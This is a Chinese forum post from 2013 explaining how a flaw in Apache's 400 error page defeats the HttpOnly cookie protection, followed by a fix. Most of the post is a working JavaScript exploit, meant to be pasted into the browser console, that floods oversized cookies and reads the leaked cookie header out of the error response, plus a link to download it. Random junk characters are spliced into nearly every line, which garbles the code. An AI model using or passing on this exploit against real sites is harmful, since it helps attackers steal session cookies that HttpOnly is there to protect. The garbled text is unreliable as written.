很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。: ~5 W$ O; s; N% t- h
n* p6 k; E3 ?3 u, ~4 p. E% j4 G1 t用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
: t2 m# s" r% g2 o4 Q: P4 m
& p6 [" d# A7 Q( l( O
; F, a3 m; r4 Q, r0 M// http://www.exploit-db.com/exploits/18442/1 H# e+ h( i$ W8 o% H+ a
function setCookies (good) {( i5 _6 w( M0 e9 n3 Q" _6 t
// Construct string for cookie value
- f$ ~" m! v+ E& g& L& q) a$ Wvar str = "";4 J# X- Q! a: J; ^# {: ]
for (var i=0; i< 819; i++) {
( G0 f8 M4 s: C7 V, g' s2 bstr += "x"; p0 a! c; t7 @1 T4 d
}
3 ~/ Z& {; S& ?5 s' c// Set cookies3 Q& ?9 @% u0 w: l) T
for (i = 0; i < 10; i++) {
/ ?8 Z1 }, [9 r( ~( X// Expire evil cookie; c9 Z' t6 R: S+ c! a
if (good) {
) A& A d- ^9 g7 v- _# evar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
) o- {2 @' k* r3 r7 P}) q) Y7 H: i1 h6 b
// Set evil cookie7 S2 U/ l- i" q; g
else {% x/ R: o9 Z- L7 D6 }1 C% p
var cookie = "xss"+i+"="+str+";path=/";
2 N: S9 }" e) i$ Y. A}* _6 \# p |7 A6 G% _( Y2 [
document.cookie = cookie;
) [ J# s" h" i5 |' c7 o}
, P, K1 _: u8 p. e1 C/ x0 u4 b' a5 Y6 o}' j u$ z9 M6 \6 v
function makeRequest() {
1 q! B3 p/ \7 BsetCookies();
: [# p% q3 U7 l" D5 Efunction parseCookies () {+ w' G/ R/ G+ Q p$ ^3 l
var cookie_dict = {};
# Y5 p* ~6 W' r9 C5 E% R// Only react on 400 status6 M9 f! ?* S4 G. L5 a
if (xhr.readyState === 4 && xhr.status === 400) {3 `8 Z. `# Q: I) C0 l. H; Z% n
// Replace newlines and match <pre> content
. e( C5 a. s; | g/ U6 I% ~var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);2 V# B7 w Y* y' B- a J0 y
if (content.length) {* {% m7 `/ s8 R1 ^( X) ^
// Remove Cookie: prefix4 H" `! ]$ H. B) z: g
content = content[1].replace("Cookie: ", "");& {7 O6 |9 |& h$ H: |
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
; ?: g/ V+ X' ~. |9 Z- u% H// Add cookies to object1 \2 h$ F N- l7 _7 e& i+ Z
for (var i=0; i<cookies.length; i++) {
. ~" s7 l) `2 {( K0 y Z+ M- Ovar s_c = cookies.split('=',2);% f0 Z. g) I: u0 U5 B
cookie_dict[s_c[0]] = s_c[1];
0 l+ Z# J& q) n7 A6 E$ C- @}
4 X U% h v3 ^8 w a8 X0 h}
- |' g3 a8 W! \8 F7 l" X// Unset malicious cookies) J2 s6 @6 l. A2 [
setCookies(true);, E0 o5 @" y" H* p
alert(JSON.stringify(cookie_dict));8 J+ G8 m: ?' |
}' }$ j7 p8 i# w
}' G' V, c% ?/ D% N- W- i* \
// Make XHR request
- ^( T, p0 {4 m7 T- D: |4 C/ fvar xhr = new XMLHttpRequest();' U% @3 E; ~0 F% b! O2 ~# u$ i
xhr.onreadystatechange = parseCookies;# {6 F* A. ?" g
xhr.open("GET", "/", true);, u# y9 T y5 t' C2 x* u1 h
xhr.send(null);+ @1 q5 q* r# P, J
}% m2 J& C+ r' c! O, ^1 _
makeRequest();9 L* Q$ v4 L- G, b, a) [0 L/ P
6 i. u' v* O" `' W; p: P: n你就能看见华丽丽的400错误包含着cookie信息。' S" k, j) i. y
/ a# R4 n9 J7 S) e
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#3 w c J J8 `3 k7 S1 M' S3 a
# W4 F2 u* Y* k9 z1 E. f( F
修复方案:! U! N. |+ G) m& }1 r& t
9 T& D% u% V$ T3 A6 Q! \1 U9 Z! [Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
3 m$ h- ]. T0 [: M9 d0 b% `9 ?1 I @
& Z7 @5 u5 z0 q2 G' F. |5 AIn the event of a problem or error, Apachecan be configured to do one of four things,( t# ]. m2 M. g; d s9 o! R/ ~
. w. p# ~3 }6 W6 ~) l, d% F" i, c
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
. j% |( F2 s' l" B2. output acustomized message输出一段信息+ H* C$ L% n2 ]) Z, R5 s
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
0 w& `% P! O5 Y/ A, A: V4. redirect to an external URL to handle theproblem/error转向一个外部URL* S* A% A: c( t+ N. [( e! M; {
) f, t1 {' P9 ~0 z: H" X经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容% \& @# T3 Z% A" |0 V3 g# c
5 X9 s) p# l3 r! X, y8 u0 s
Apache配置:
, o) d- v' N) j' q" g4 r) Y
3 X X! W9 y/ U7 ]; xErrorDocument400 " security test"8 G% {9 a1 Y7 c5 z7 ?
; d1 y; g- a0 J1 X
当然,升级apache到最新也可:)。& |5 y0 H3 j7 b3 q$ G- f( z
$ l1 N' @3 Y% |) S$ _参考:http://httpd.apache.org/security/vulnerabilities_22.html
2 E9 R# n; u6 o) G* W
5 W" \( b, j! n* o7 S. x |
发表于 2013-4-19 19:15:43
收藏
支持
反对